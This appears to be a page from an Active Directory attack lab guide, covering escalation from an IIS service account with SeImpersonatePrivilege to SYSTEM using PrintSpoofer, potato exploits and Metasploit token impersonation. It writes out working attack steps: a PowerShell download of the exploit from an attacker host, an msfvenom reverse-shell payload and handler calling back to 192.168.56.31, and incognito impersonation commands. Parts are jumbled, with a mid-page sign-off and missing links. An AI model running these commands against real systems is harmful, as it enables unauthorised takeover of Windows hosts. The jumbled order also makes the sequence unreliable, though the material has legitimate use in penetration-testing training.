Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • With PrintSpoofer
  • Check if we have SeImpersonatePrivilege enabled
  • Download PrintSpoofer
  • Upload PrintSpoofer
  • Got Priv?
  • With Metasploitttt
  • Let’s generate tokens
  1. Exploiting IIS & Privilege escalation

SeImpersonatePrivilege to Authority\system

PreviouswinPeas without touching diskNextKrbRelay Up - Linux

Last updated 2 years ago

  • To escalate privilege from our iis (or mssql) user with SeImpersonatePrivilege to Authority\system we can use one of the “potatoes” technic.

  • A wonderfull blog post explain the different potatoes here :

  • So let’s use , a compilation of all the technics, “the potatoe to rule them all”.

  • Ok so we clone the project and compile it with visualStudio

  • Prepare a bat file to run ou powershell basic reverse shell on execution

With PrintSpoofer

Check if we have SeImpersonatePrivilege enabled 

whoami /priv

Download PrintSpoofer

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Upload PrintSpoofer

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PrintSpoofer64.exe', 'C:\Users\pacofish\Desktop\PrintSpoofer64.exe')

Got Priv?

.\PrintSpoofer64.exe -i -c cmd

With Metasploitttt

Now we’ll run load incognito. This tool is used to escalate privileges inside Active Directory environments. With incognito, we are able to impersonate authenticated tokens on the target windows machine.

load incognito

The tokens can be listed with the command list_tokens -u (for users) and list_tokens -g ( for groups). But the commands wont list any impersonation token because we havent yet tricked the Administration to authenticate.

Let’s generate tokens

execute -cH -f potato.exe

Once the exe gets executed, we can again list the tokens, if generated in the process.

Volla! We have got impersonation tokens now. And to our interest, BUILTIN\Administrators has a Impersonation token available. So let’s impersonate it.

With impersonate_token module, the account of any user can be mimed

After impersonation, we get the shell as nt authority\system.

That’s all for this blog post. Hope you enjoyed reading. Until then, Happy Hacking!!

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f exe > shell.exe

Before Executing the payload, we will need to create a listener that will capture the meterpreter reverse shell generated from the payload. We will need to provide the same configurations that we used while crafting the payload using the msfvenom. Next, we will exploit the payload on the machine using the aspx shell and receive the meterpreter shell. Since we are focusing on the Privileges in this piece, we ran the getprivs command to get the privileges that are enabled on the target machine. We can see that the privilege in question is enabled on the target machine i.e., SeImpersontatePrivilege.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.31
set lport 1234
exploit
getprivs

Although you don’t need to rely on the Metepreter shell’s getprivs command. You can check for the enabled privilege can be checked with the help of the whoami command with the /priv option added to it as shown in the image below. We can see that the session that we gained through exploitation is for the user iisapppool.

shell
whoami /priv
whoami

The exploit of the scenerio can be achieved with an exe, rottenpotato.exe that does the actual working of tricking the Administrator via NTLM. The file can be downloaded from . Now we have to upload the exe to the meterpreter shell. It can be easily done via upload command. Then execute the exe with

https://jlajara.gitlab.io/Potatoes_Windows_Privesc
SweetPotato
here